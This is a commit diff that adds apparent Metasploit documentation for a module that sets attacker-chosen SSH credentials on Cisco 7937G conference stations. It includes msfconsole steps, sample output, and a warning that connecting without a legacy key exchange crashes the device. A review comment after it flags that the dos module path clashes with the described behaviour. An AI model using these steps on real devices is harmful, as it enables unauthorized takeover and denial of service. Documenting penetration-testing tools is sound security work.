parent
8fe7417d1b
commit
1e244ddaec
@ -0,0 +1,44 @@
## Vulnerable Application

1. Obtain a Cisco 7937G Conference Station.
2. Enable Web Access and SSH Access on the device.
3. It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.

## Verification Steps

1. Start msfconsole
2. Do: `use auxiliary/dos/cisco/CVE-2020-16139`
3. Do: `set RHOSTS 192.168.1.10`
4. Do: `set USER test`
5. Do: `set PASS test`
6. Do: `run`
7. The conference station's SSH service should now be configured with the supplied USER:PASS.

## Options

1. PASS (required) - Desired password
2. RHOSTS (required) - Target addres
3. THREADS (default 1, required) - The number of concurrent threads (max one per host)
4. TIMEOUT (default 5, required) - Timeout in seconds before aborting
5. USER (required) - Desired username

## Scenarios

#### Successful Scenario
```
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
```

#### Unsuccessful Scenario
```
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
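Review bot: step 2 of Verification Steps loads `auxiliary/dos/cisco/CVE-2020-16139`, a path under `dos`, yet step 7 and both scenario outputs describe setting SSH credentials on the device ("Attempting to set SSH credentials"), so the module path or CVE id in this doc looks copied from a different module and should be checked against the module this file actually documents. The Vulnerable Application section never says what the flaw is or which firmware versions were tested; item 3 ("all version are likely vulnerable") is an observation rather than a setup step and would read better as a short description paragraph that names the tested firmware. The warning that connecting without `-oKexAlgorithms=+diffie-hellman-group1-sha1` will DoS the device appears only in the sample output; it deserves its own line in Verification Steps, since a tester following steps 1 to 7 has no other prompt to use it. Small fixes: "Target addres" in Options is missing a letter, "all version" should be plural, and the example RHOSTS (`192.168.1.10`) does not match the address shown in the scenarios (`192.168.110.209`).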